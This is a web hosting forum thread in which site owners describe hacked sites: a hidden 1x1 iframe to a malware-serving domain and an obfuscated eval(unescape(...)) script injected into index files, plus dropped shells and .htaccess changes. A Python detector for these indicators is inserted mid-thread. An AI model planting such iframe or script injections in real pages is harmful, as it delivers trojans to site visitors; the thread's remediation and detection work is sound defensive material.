#126
Quote:
Thank god for firefox
#127
Sorry to revive this thread, but approximately 16 hours ago several (I'm still checking) of my client sites were hacked. Here are the details:
File affected: index.php
Code injected: <iframe src="http://xxxx.org/go.php" width=1 height=1></iframe>
(Note: to protect users of this forum I am NOT including the tld in the above url, but for the curious, substitute "wolf-ware" for the x's.) The index.php file permissions are set to 644. I need to get back to checking the rest of my sites. I'll post more details as I can. Anyone else attacked?
#128
__________________
Vtrain is Linux User #237333 on http://counter.li.org/ "Don't meddle in the affairs of sysadmins, for they are subtle and quick to anger."
#129
UPDATE:
Approximately 90% of my sites were hit; I have no idea why some were skipped. Some sites were Joomla, others plain HTML and PHP. The hacker added his code to all files that began with "index" (index.php, index2.php, index.shtml, index.bak, index.sav, etc.). A handful of sites also had a script inserted, which began with "<script>eval(unescape('%64%6f%63%75%6d%65%6e%74..." I saved the code if anyone wants to try to figure it out. I put a ticket in to HG.
#130
I don't have any sites that are exclusively forums-driven but your message prompted me to go check the ones that have forums installed in sub-directories and they seem fine. It looks like the hack only affected the root folder.
The Joomla sites that were hit were all running the latest version. By the way, the code was injected at the bottom of the index files, except for one instance where the hacker put it at the top. That's how I found it: it was throwing up a headers error...
#131
Hi,
Was it on one specific server only or more? Did you notice any setRequestHeader method in the requests? I am trying to figure out an injection in the default index file of the virtual server, but it seems the kernel was compromised, which injected text while the page was served. Once infected, the pages download malware to the users' PCs. You might like to try this:

replace "baddomainyoucansee" "google" -- /pathto/public_html/*/index.*

This will basically replace the text, which will give a 404 and won't cause damage. I am suspecting a kernel upgrade as a solution.
Regds IJ
#132
BTW, wondering if this has any relevance, although it is not remotely exploitable:
http://www.frsirt.com/english/advisories/2006/5002
Whatever it is, wish you a fast recovery!
Regds IJ
#133
LOL! Mine got infected too!
For index.*, it adds to the top as well as the bottom; for index*, it adds only to the bottom.
Regds IJ
#134
The hackers also replace the .htaccess file... It's a big mess...
#135
Quote:
http://forums.hostgator.com/showthread.php?t=12642
#136
Hi,
Please shed some light if anyone can. I have a reseller account and I have also got this IFRAME problem. HG support on day 1 said it had been fixed server side; it was an error in Apache. I was very happy. Two days later it popped up again, and ever since, we clean the code, clean .htaccess, and within 24 hours it is there again. In my case the URL is a Russian one (or lan gur dot org). It downloads multiple trojans onto end users' machines (running Windows). HG support seems to just clean the files and clean the .htaccess. Unfortunately not all users have backups, so this can't go on forever. HG support says it is most likely an issue from the client's insecure code or directory/file access. However, we have done the coding and we have not included any files using variables. No directories/files are 777. Forms use captcha code. No unusual things in awstats or access logs. They dropped the r99 shell file (thankfully HG identifies it) and a tool that reads plaintext passwords from config files. They were removed but still the injection is there. For 5 days, we clean the files and it comes back within 24 hours. Has anyone successfully killed this issue? Any thoughts?
Regds IJ
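A defender-side check for the indicators described in #127, #129 and #136, added here as an example and not part of the thread or of any tool mentioned in it: it walks a webroot for every file named index* and flags the 1x1 iframe and the eval(unescape('%..')) stub, decoding the hex run so the admin can see what the obfuscated script starts with. The sample file contents and the malicious.example domain are constructed placeholders.

```python
import re
from pathlib import Path

# Indicators reported in the thread: a 1x1 iframe appended to index* files
# and an obfuscated <script>eval(unescape('%64%6f%63...')) stub.
HIDDEN_IFRAME = re.compile(
    r"""<iframe(?=[^>]*\bwidth\s*=\s*["']?[01]\b)"""
    r"""(?=[^>]*\bheight\s*=\s*["']?[01]\b)[^>]*>""",
    re.IGNORECASE,
)
EVAL_UNESCAPE = re.compile(
    r"""eval\s*\(\s*unescape\s*\(\s*["'](?:%[0-9a-f]{2}){8,}""",
    re.IGNORECASE,
)

def scan_text(text):
    """Return [(indicator, detail)] for one file's contents; [] if clean."""
    findings = []
    for m in HIDDEN_IFRAME.finditer(text):
        findings.append(("hidden-iframe", m.group(0)))
    for m in EVAL_UNESCAPE.finditer(text):
        # Decode the %xx run so the report shows what the script starts with
        # (the fragment quoted in the thread decodes to "document").
        hexes = re.findall(r"%([0-9a-f]{2})", m.group(0), re.IGNORECASE)
        decoded = bytes(int(h, 16) for h in hexes).decode("latin-1")
        findings.append(("eval-unescape", decoded))
    return findings

def scan_webroot(root):
    """Scan every index* file under root (index.php, index2.php, index.bak, ...)."""
    root = Path(root)
    report = {}
    for path in root.rglob("index*"):
        if path.is_file():
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report

# Constructed samples (not files from the thread); the domain is a placeholder.
SAMPLE_CLEAN = (
    "<?php include 'config.php'; ?>\n"
    '<html><body><iframe src="/widget.php" width=300 height=200></iframe></body></html>\n'
)
SAMPLE_INFECTED = SAMPLE_CLEAN + (
    '<iframe src="http://malicious.example/go.php" width=1 height=1></iframe>\n'
    "<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65'))</script>\n"
)
```

Calling scan_webroot on a reseller's home directory reports each infected index* file with the iframe tag and the decoded start of the script; a legitimate full-size iframe such as the one in SAMPLE_CLEAN is not flagged.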
#137
I had these guys harden my dedicated box after I got hit by the iframe deal.
http://www.webhostgear.com
HG support wiped and reloaded the box and restored backup, then had WHG harden the box, and it hasn't been rooted since.
bh
#138
Sorry if this sounds stupid, but have you changed your passwords?